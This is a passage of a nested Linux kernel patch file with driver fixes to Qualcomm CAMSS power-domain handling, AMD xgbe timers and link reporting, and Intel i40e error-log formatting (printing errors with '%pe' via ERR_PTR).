++	struct camss *camss = vfe->camss;
++	enum vfe_line_id id = vfe->id;
++
++	if (id >= camss->vfe_num)
++		return 0;
++
++	camss->genpd_link[id] = device_link_add(camss->dev, camss->genpd[id],
++						DL_FLAG_STATELESS |
++						DL_FLAG_PM_RUNTIME |
++						DL_FLAG_RPM_ACTIVE);
++	if (!camss->genpd_link[id])
++		return -EINVAL;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/media/platform/qcom/camss/camss.c b/drivers/media/platform/qcom/camss/camss.c
+index 5057b2c4cf6c4..a30461de3e844 100644
+--- a/drivers/media/platform/qcom/camss/camss.c
++++ b/drivers/media/platform/qcom/camss/camss.c
+@@ -1453,7 +1453,6 @@ static const struct media_device_ops camss_media_ops = {
+ static int camss_configure_pd(struct camss *camss)
+ {
+ 	struct device *dev = camss->dev;
+-	int last_pm_domain = 0;
+ 	int i;
+ 	int ret;
+ 
+@@ -1484,32 +1483,34 @@ static int camss_configure_pd(struct camss *camss)
+ 	if (!camss->genpd_link)
+ 		return -ENOMEM;
+ 
++	/*
++	 * VFE power domains are in the beginning of the list, and while all
++	 * power domains should be attached, only if TITAN_TOP power domain is
++	 * found in the list, it should be linked over here.
++	 */
+ 	for (i = 0; i < camss->genpd_num; i++) {
+ 		camss->genpd[i] = dev_pm_domain_attach_by_id(camss->dev, i);
+ 		if (IS_ERR(camss->genpd[i])) {
+ 			ret = PTR_ERR(camss->genpd[i]);
+ 			goto fail_pm;
+ 		}
++	}
+ 
+-		camss->genpd_link[i] = device_link_add(camss->dev, camss->genpd[i],
+-						       DL_FLAG_STATELESS | DL_FLAG_PM_RUNTIME |
+-						       DL_FLAG_RPM_ACTIVE);
+-		if (!camss->genpd_link[i]) {
+-			dev_pm_domain_detach(camss->genpd[i], true);
++	if (i > camss->vfe_num) {
++		camss->genpd_link[i - 1] = device_link_add(camss->dev, camss->genpd[i - 1],
++							   DL_FLAG_STATELESS | DL_FLAG_PM_RUNTIME |
++							   DL_FLAG_RPM_ACTIVE);
++		if (!camss->genpd_link[i - 1]) {
+ 			ret = -EINVAL;
+ 			goto fail_pm;
+ 		}
+-
+-		last_pm_domain = i;
+ 	}
+ 
+ 	return 0;
+ 
+ fail_pm:
+-	for (i = 0; i < last_pm_domain; i++) {
+-		device_link_del(camss->genpd_link[i]);
++	for (--i ; i >= 0; i--)
+ 		dev_pm_domain_detach(camss->genpd[i], true);
+-	}
+ 
+ 	return ret;
+ }
+@@ -1537,6 +1538,20 @@ static int camss_icc_get(struct camss *camss)
+ 	return 0;
+ }
+ 
++static void camss_genpd_cleanup(struct camss *camss)
++{
++	int i;
++
++	if (camss->genpd_num == 1)
++		return;
++
++	if (camss->genpd_num > camss->vfe_num)
++		device_link_del(camss->genpd_link[camss->genpd_num - 1]);
++
++	for (i = 0; i < camss->genpd_num; i++)
++		dev_pm_domain_detach(camss->genpd[i], true);
++}
++
+ /*
+  * camss_probe - Probe CAMSS platform device
+  * @pdev: Pointer to CAMSS platform device
+@@ -1612,31 +1627,23 @@ static int camss_probe(struct platform_device *pdev)
+ 	if (!camss->vfe)
+ 		return -ENOMEM;
+ 
+-	v4l2_async_nf_init(&camss->notifier);
+-
+-	num_subdevs = camss_of_parse_ports(camss);
+-	if (num_subdevs < 0) {
+-		ret = num_subdevs;
+-		goto err_cleanup;
+-	}
+-
+ 	ret = camss_icc_get(camss);
+ 	if (ret < 0)
+-		goto err_cleanup;
++		return ret;
+ 
+ 	ret = camss_configure_pd(camss);
+ 	if (ret < 0) {
+ 		dev_err(dev, "Failed to configure power domains: %d\n", ret);
+-		goto err_cleanup;
++		return ret;
+ 	}
+ 
+ 	ret = camss_init_subdevices(camss);
+ 	if (ret < 0)
+-		goto err_cleanup;
++		goto err_genpd_cleanup;
+ 
+ 	ret = dma_set_mask_and_coherent(dev, 0xffffffff);
+ 	if (ret)
+-		goto err_cleanup;
++		goto err_genpd_cleanup;
+ 
+ 	camss->media_dev.dev = camss->dev;
+ 	strscpy(camss->media_dev.model, "Qualcomm Camera Subsystem",
+@@ -1648,12 +1655,20 @@ static int camss_probe(struct platform_device *pdev)
+ 	ret = v4l2_device_register(camss->dev, &camss->v4l2_dev);
+ 	if (ret < 0) {
+ 		dev_err(dev, "Failed to register V4L2 device: %d\n", ret);
+-		goto err_cleanup;
++		goto err_genpd_cleanup;
++	}
++
++	v4l2_async_nf_init(&camss->notifier);
++
++	num_subdevs = camss_of_parse_ports(camss);
++	if (num_subdevs < 0) {
++		ret = num_subdevs;
++		goto err_v4l2_device_unregister;
+ 	}
+ 
+ 	ret = camss_register_entities(camss);
+ 	if (ret < 0)
+-		goto err_register_entities;
++		goto err_v4l2_device_unregister;
+ 
+ 	if (num_subdevs) {
+ 		camss->notifier.ops = &camss_subdev_notifier_ops;
+@@ -1688,31 +1703,22 @@ static int camss_probe(struct platform_device *pdev)
+ 
+ err_register_subdevs:
+ 	camss_unregister_entities(camss);
+-err_register_entities:
++err_v4l2_device_unregister:
+ 	v4l2_device_unregister(&camss->v4l2_dev);
+-err_cleanup:
+ 	v4l2_async_nf_cleanup(&camss->notifier);
++err_genpd_cleanup:
++	camss_genpd_cleanup(camss);
+ 
+ 	return ret;
+ }
+ 
+ void camss_delete(struct camss *camss)
+ {
+-	int i;
+-
+ 	v4l2_device_unregister(&camss->v4l2_dev);
+ 	media_device_unregister(&camss->media_dev);
+ 	media_device_cleanup(&camss->media_dev);
+ 
+ 	pm_runtime_disable(camss->dev);
+-
+-	if (camss->genpd_num == 1)
+-		return;
+-
+-	for (i = 0; i < camss->genpd_num; i++) {
+-		device_link_del(camss->genpd_link[i]);
+-		dev_pm_domain_detach(camss->genpd[i], true);
+-	}
+ }
+ 
+ /*
+@@ -1721,7 +1727,7 @@ void camss_delete(struct camss *camss)
+  *
+  * Always returns 0.
+  */
+-static int camss_remove(struct platform_device *pdev)
++static void camss_remove(struct platform_device *pdev)
+ {
+ 	struct camss *camss = platform_get_drvdata(pdev);
+ 
+@@ -1732,7 +1738,7 @@ static int camss_remove(struct platform_device *pdev)
+ 	if (atomic_read(&camss->ref_count) == 0)
+ 		camss_delete(camss);
+ 
+-	return 0;
++	camss_genpd_cleanup(camss);
+ }
+ 
+ static const struct of_device_id camss_dt_match[] = {
+@@ -1794,7 +1800,7 @@ static const struct dev_pm_ops camss_pm_ops = {
+ 
+ static struct platform_driver qcom_camss_driver = {
+ 	.probe = camss_probe,
+-	.remove = camss_remove,
++	.remove_new = camss_remove,
+ 	.driver = {
+ 		.name = "qcom-camss",
+ 		.of_match_table = camss_dt_match,
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-drv.c b/drivers/net/ethernet/amd/xgbe/xgbe-drv.c
+index 614c0278419bc..6b73648b37793 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-drv.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-drv.c
+@@ -682,10 +682,24 @@ static void xgbe_service(struct work_struct *work)
+ static void xgbe_service_timer(struct timer_list *t)
+ {
+ 	struct xgbe_prv_data *pdata = from_timer(pdata, t, service_timer);
++	struct xgbe_channel *channel;
++	unsigned int i;
+ 
+ 	queue_work(pdata->dev_workqueue, &pdata->service_work);
+ 
+ 	mod_timer(&pdata->service_timer, jiffies + HZ);
++
++	if (!pdata->tx_usecs)
++		return;
++
++	for (i = 0; i < pdata->channel_count; i++) {
++		channel = pdata->channel[i];
++		if (!channel->tx_ring || channel->tx_timer_active)
++			break;
++		channel->tx_timer_active = 1;
++		mod_timer(&channel->tx_timer,
++			  jiffies + usecs_to_jiffies(pdata->tx_usecs));
++	}
+ }
+ 
+ static void xgbe_init_timers(struct xgbe_prv_data *pdata)
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-ethtool.c b/drivers/net/ethernet/amd/xgbe/xgbe-ethtool.c
+index 6e83ff59172a3..32fab5e772462 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-ethtool.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-ethtool.c
+@@ -314,10 +314,15 @@ static int xgbe_get_link_ksettings(struct net_device *netdev,
+ 
+ 	cmd->base.phy_address = pdata->phy.address;
+ 
+-	cmd->base.autoneg = pdata->phy.autoneg;
+-	cmd->base.speed = pdata->phy.speed;
+-	cmd->base.duplex = pdata->phy.duplex;
++	if (netif_carrier_ok(netdev)) {
++		cmd->base.speed = pdata->phy.speed;
++		cmd->base.duplex = pdata->phy.duplex;
++	} else {
++		cmd->base.speed = SPEED_UNKNOWN;
++		cmd->base.duplex = DUPLEX_UNKNOWN;
++	}
+ 
++	cmd->base.autoneg = pdata->phy.autoneg;
+ 	cmd->base.port = PORT_NONE;
+ 
+ 	XGBE_LM_COPY(cmd, supported, lks, supported);
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c b/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
+index ca7372369b3e6..60be836b294bb 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
+@@ -1178,7 +1178,19 @@ static int xgbe_phy_config_fixed(struct xgbe_prv_data *pdata)
+ 	if (pdata->phy.duplex != DUPLEX_FULL)
+ 		return -EINVAL;
+ 
+-	xgbe_set_mode(pdata, mode);
++	/* Force the mode change for SFI in Fixed PHY config.
++	 * Fixed PHY configs needs PLL to be enabled while doing mode set.
++	 * When the SFP module isn't connected during boot, driver assumes
++	 * AN is ON and attempts autonegotiation. However, if the connected
++	 * SFP comes up in Fixed PHY config, the link will not come up as
++	 * PLL isn't enabled while the initial mode set command is issued.
++	 * So, force the mode change for SFI in Fixed PHY configuration to
++	 * fix link issues.
++	 */
++	if (mode == XGBE_MODE_SFI)
++		xgbe_change_mode(pdata, mode);
++	else
++		xgbe_set_mode(pdata, mode);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_client.c b/drivers/net/ethernet/intel/i40e/i40e_client.c
+index 8bcb98b85e3d9..a289f1bb3dbfc 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_client.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_client.c
+@@ -686,8 +686,8 @@ static int i40e_client_update_vsi_ctxt(struct i40e_info *ldev,
+ 	ctxt.flags = I40E_AQ_VSI_TYPE_PF;
+ 	if (err) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %d aq_err %s\n",
+-			 err,
++			 "couldn't get PF vsi config, err %pe aq_err %s\n",
++			 ERR_PTR(err),
+ 			 i40e_aq_str(&pf->hw,
+ 				     pf->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -714,8 +714,8 @@ static int i40e_client_update_vsi_ctxt(struct i40e_info *ldev,
+ 		err = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 		if (err) {
+ 			dev_info(&pf->pdev->dev,
+-				 "update VSI ctxt for PE failed, err %d aq_err %s\n",
+-				 err,
++				 "update VSI ctxt for PE failed, err %pe aq_err %s\n",
++				 ERR_PTR(err),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 		}
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c b/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
+index bba70bd5703bf..195421d863ab1 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
+@@ -135,8 +135,8 @@ static int i40e_dcbnl_ieee_setets(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB ETS configuration err %d aq_err %s\n",
+-			 ret,
++			 "Failed setting DCB ETS configuration err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -174,8 +174,8 @@ static int i40e_dcbnl_ieee_setpfc(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB PFC configuration err %d aq_err %s\n",
+-			 ret,
++			 "Failed setting DCB PFC configuration err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -225,8 +225,8 @@ static int i40e_dcbnl_ieee_setapp(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB configuration err %d aq_err %s\n",
+-			 ret,
++			 "Failed setting DCB configuration err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -290,8 +290,8 @@ static int i40e_dcbnl_ieee_delapp(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB configuration err %d aq_err %s\n",
+-			 ret,
++			 "Failed setting DCB configuration err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
+index e632041aed5f8..107bcca7db8c9 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
+@@ -1453,8 +1453,8 @@ static int i40e_set_link_ksettings(struct net_device *netdev,
+ 		status = i40e_aq_set_phy_config(hw, &config, NULL);
+ 		if (status) {
+ 			netdev_info(netdev,
+-				    "Set phy config failed, err %d aq_err %s\n",
+-				    status,
++				    "Set phy config failed, err %pe aq_err %s\n",
++				    ERR_PTR(status),
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			err = -EAGAIN;
+ 			goto done;
+@@ -1463,8 +1463,8 @@ static int i40e_set_link_ksettings(struct net_device *netdev,
+ 		status = i40e_update_link_info(hw);
+ 		if (status)
+ 			netdev_dbg(netdev,
+-				   "Updating link info failed with err %d aq_err %s\n",
+-				   status,
++				   "Updating link info failed with err %pe aq_err %s\n",
++				   ERR_PTR(status),
+ 				   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 
+ 	} else {
+@@ -1515,8 +1515,8 @@ static int i40e_set_fec_cfg(struct net_device *netdev, u8 fec_cfg)
+ 		status = i40e_aq_set_phy_config(hw, &config, NULL);
+ 		if (status) {
+ 			netdev_info(netdev,
+-				    "Set phy config failed, err %d aq_err %s\n",
+-				    status,
++				    "Set phy config failed, err %pe aq_err %s\n",
++				    ERR_PTR(status),
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			err = -EAGAIN;
+ 			goto done;
+@@ -1529,8 +1529,8 @@ static int i40e_set_fec_cfg(struct net_device *netdev, u8 fec_cfg)
+ 			 * (e.g. no physical connection etc.)
+ 			 */
+ 			netdev_dbg(netdev,
+-				   "Updating link info failed with err %d aq_err %s\n",
+-				   status,
++				   "Updating link info failed with err %pe aq_err %s\n",
++				   ERR_PTR(status),
+ 				   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 	}
+ 
+@@ -1636,8 +1636,8 @@ static int i40e_nway_reset(struct net_device *netdev)
+ 
+ 	ret = i40e_aq_set_link_restart_an(hw, link_up, NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "link restart failed, err %d aq_err %s\n",
+-			    ret,
++		netdev_info(netdev, "link restart failed, err %pe aq_err %s\n",
++			    ERR_PTR(ret),
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -1753,20 +1753,20 @@ static int i40e_set_pauseparam(struct net_device *netdev,
+ 	status = i40e_set_fc(hw, &aq_failures, link_up);
+ 
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_GET) {
+-		netdev_info(netdev, "Set fc failed on the get_phy_capabilities call with err %d aq_err %s\n",
+-			    status,
++		netdev_info(netdev, "Set fc failed on the get_phy_capabilities call with err %pe aq_err %s\n",
++			    ERR_PTR(status),
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_SET) {
+-		netdev_info(netdev, "Set fc failed on the set_phy_config call with err %d aq_err %s\n",
+-			    status,
++		netdev_info(netdev, "Set fc failed on the set_phy_config call with err %pe aq_err %s\n",
++			    ERR_PTR(status),
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_UPDATE) {
+-		netdev_info(netdev, "Set fc failed on the get_link_info call with err %d aq_err %s\n",
+-			    status,
++		netdev_info(netdev, "Set fc failed on the get_link_info call with err %pe aq_err %s\n",
++			    ERR_PTR(status),
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+@@ -5360,8 +5360,8 @@ flags_complete:
+ 						0, NULL);
+ 		if (ret && pf->hw.aq.asq_last_status != I40E_AQ_RC_ESRCH) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't set switch config bits, err %d aq_err %s\n",
+-				 ret,
++				 "couldn't set switch config bits, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			/* not a fatal problem, just keep going */
+@@ -5433,8 +5433,8 @@ flags_complete:
+ 					return -EBUSY;
+ 				default:
+ 					dev_warn(&pf->pdev->dev,
+-						 "Starting FW LLDP agent failed: error: %d, %s\n",
+-						 status,
++						 "Starting FW LLDP agent failed: error: %pe, %s\n",
++						 ERR_PTR(status),
+ 						 i40e_aq_str(&pf->hw,
+ 							     adq_err));
+ 					return -EINVAL;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 68ee2c59692d1..9f5824eb8808a 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -1822,8 +1822,8 @@ static int i40e_set_mac(struct net_device *netdev, void *p)
+ 		ret = i40e_aq_mac_address_write(hw, I40E_AQC_WRITE_TYPE_LAA_WOL,
+ 						addr->sa_data, NULL);
+ 		if (ret)
+-			netdev_info(netdev, "Ignoring error from firmware on LAA update, status %d, AQ ret %s\n",
+-				    ret,
++			netdev_info(netdev, "Ignoring error from firmware on LAA update, status %pe, AQ ret %s\n",
++				    ERR_PTR(ret),
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 	}
+ 
+@@ -1854,8 +1854,8 @@ static int i40e_config_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_set_rss_key(hw, vsi->id, seed_dw);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot set RSS key, err %d aq_err %s\n",
+-				 ret,
++				 "Cannot set RSS key, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			return ret;
+ 		}
+@@ -1866,8 +1866,8 @@ static int i40e_config_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_set_rss_lut(hw, vsi->id, pf_lut, lut, lut_size);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot set RSS lut, err %d aq_err %s\n",
+-				 ret,
++				 "Cannot set RSS lut, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			return ret;
+ 		}
+@@ -2358,8 +2358,8 @@ void i40e_aqc_del_filters(struct i40e_vsi *vsi, const char *vsi_name,
+ 	if (aq_ret && !(aq_status == I40E_AQ_RC_ENOENT)) {
+ 		*retval = -EIO;
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "ignoring delete macvlan error on %s, err %d, aq_err %s\n",
+-			 vsi_name, aq_ret,
++			 "ignoring delete macvlan error on %s, err %pe, aq_err %s\n",
++			 vsi_name, ERR_PTR(aq_ret),
+ 			 i40e_aq_str(hw, aq_status));
+ 	}
+ }
+@@ -2488,8 +2488,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 							   NULL);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Set default VSI failed, err %d, aq_err %s\n",
+-				 aq_ret,
++				 "Set default VSI failed, err %pe, aq_err %s\n",
++				 ERR_PTR(aq_ret),
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	} else {
+@@ -2500,8 +2500,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 						  true);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "set unicast promisc failed, err %d, aq_err %s\n",
+-				 aq_ret,
++				 "set unicast promisc failed, err %pe, aq_err %s\n",
++				 ERR_PTR(aq_ret),
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 		aq_ret = i40e_aq_set_vsi_multicast_promiscuous(
+@@ -2510,8 +2510,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 						  promisc, NULL);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "set multicast promisc failed, err %d, aq_err %s\n",
+-				 aq_ret,
++				 "set multicast promisc failed, err %pe, aq_err %s\n",
++				 ERR_PTR(aq_ret),
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	}
+@@ -2815,9 +2815,9 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 			retval = i40e_aq_rc_to_posix(aq_ret,
+ 						     hw->aq.asq_last_status);
+ 			dev_info(&pf->pdev->dev,
+-				 "set multi promisc failed on %s, err %d aq_err %s\n",
++				 "set multi promisc failed on %s, err %pe aq_err %s\n",
+ 				 vsi_name,
+-				 aq_ret,
++				 ERR_PTR(aq_ret),
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		} else {
+ 			dev_info(&pf->pdev->dev, "%s allmulti mode.\n",
+@@ -2835,10 +2835,10 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 			retval = i40e_aq_rc_to_posix(aq_ret,
+ 						     hw->aq.asq_last_status);
+ 			dev_info(&pf->pdev->dev,
+-				 "Setting promiscuous %s failed on %s, err %d aq_err %s\n",
++				 "Setting promiscuous %s failed on %s, err %pe aq_err %s\n",
+ 				 cur_promisc ? "on" : "off",
+ 				 vsi_name,
+-				 aq_ret,
++				 ERR_PTR(aq_ret),
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	}
+@@ -2986,8 +2986,8 @@ void i40e_vlan_stripping_enable(struct i40e_vsi *vsi)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "update vlan stripping failed, err %d aq_err %s\n",
+-			 ret,
++			 "update vlan stripping failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 	}
+@@ -3021,8 +3021,8 @@ void i40e_vlan_stripping_disable(struct i40e_vsi *vsi)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "update vlan stripping failed, err %d aq_err %s\n",
+-			 ret,
++			 "update vlan stripping failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 	}
+@@ -3266,8 +3266,8 @@ int i40e_vsi_add_pvid(struct i40e_vsi *vsi, u16 vid)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "add pvid failed, err %d aq_err %s\n",
+-			 ret,
++			 "add pvid failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -5533,8 +5533,8 @@ static int i40e_vsi_get_bw_info(struct i40e_vsi *vsi)
+ 	ret = i40e_aq_query_vsi_bw_config(hw, vsi->seid, &bw_config, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi bw config, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't get PF vsi bw config, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -5544,8 +5544,8 @@ static int i40e_vsi_get_bw_info(struct i40e_vsi *vsi)
+ 					       NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi ets bw config, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't get PF vsi ets bw config, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -5734,8 +5734,8 @@ int i40e_update_adq_vsi_queues(struct i40e_vsi *vsi, int vsi_offset)
+ 
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "Update vsi config failed, err %d aq_err %s\n",
+-			 ret,
++		dev_info(&pf->pdev->dev, "Update vsi config failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -5790,8 +5790,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 						  &bw_config, NULL);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Failed querying vsi bw info, err %d aq_err %s\n",
+-				 ret,
++				 "Failed querying vsi bw info, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			goto out;
+ 		}
+@@ -5857,8 +5857,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Update vsi tc config failed, err %d aq_err %s\n",
+-			 ret,
++			 "Update vsi tc config failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -5870,8 +5870,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 	ret = i40e_vsi_get_bw_info(vsi);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed updating vsi bw info, err %d aq_err %s\n",
+-			 ret,
++			 "Failed updating vsi bw info, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -5962,8 +5962,8 @@ int i40e_set_bw_limit(struct i40e_vsi *vsi, u16 seid, u64 max_tx_rate)
+ 					  I40E_MAX_BW_INACTIVE_ACCUM, NULL);
+ 	if (ret)
+ 		dev_err(&pf->pdev->dev,
+-			"Failed set tx rate (%llu Mbps) for vsi->seid %u, err %d aq_err %s\n",
+-			max_tx_rate, seid, ret,
++			"Failed set tx rate (%llu Mbps) for vsi->seid %u, err %pe aq_err %s\n",
++			max_tx_rate, seid, ERR_PTR(ret),
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	return ret;
+ }
+@@ -6038,8 +6038,8 @@ static void i40e_remove_queue_channels(struct i40e_vsi *vsi)
+ 			last_aq_status = pf->hw.aq.asq_last_status;
+ 			if (ret)
+ 				dev_info(&pf->pdev->dev,
+-					 "Failed to delete cloud filter, err %d aq_err %s\n",
+-					 ret,
++					 "Failed to delete cloud filter, err %pe aq_err %s\n",
++					 ERR_PTR(ret),
+ 					 i40e_aq_str(&pf->hw, last_aq_status));
+ 			kfree(cfilter);
+ 		}
+@@ -6173,8 +6173,8 @@ static int i40e_vsi_reconfig_rss(struct i40e_vsi *vsi, u16 rss_size)
+ 	ret = i40e_config_rss(vsi, seed, lut, vsi->rss_table_size);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot set RSS lut, err %d aq_err %s\n",
+-			 ret,
++			 "Cannot set RSS lut, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		kfree(lut);
+ 		return ret;
+@@ -6272,8 +6272,8 @@ static int i40e_add_channel(struct i40e_pf *pf, u16 uplink_seid,
+ 	ret = i40e_aq_add_vsi(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "add new vsi failed, err %d aq_err %s\n",
+-			 ret,
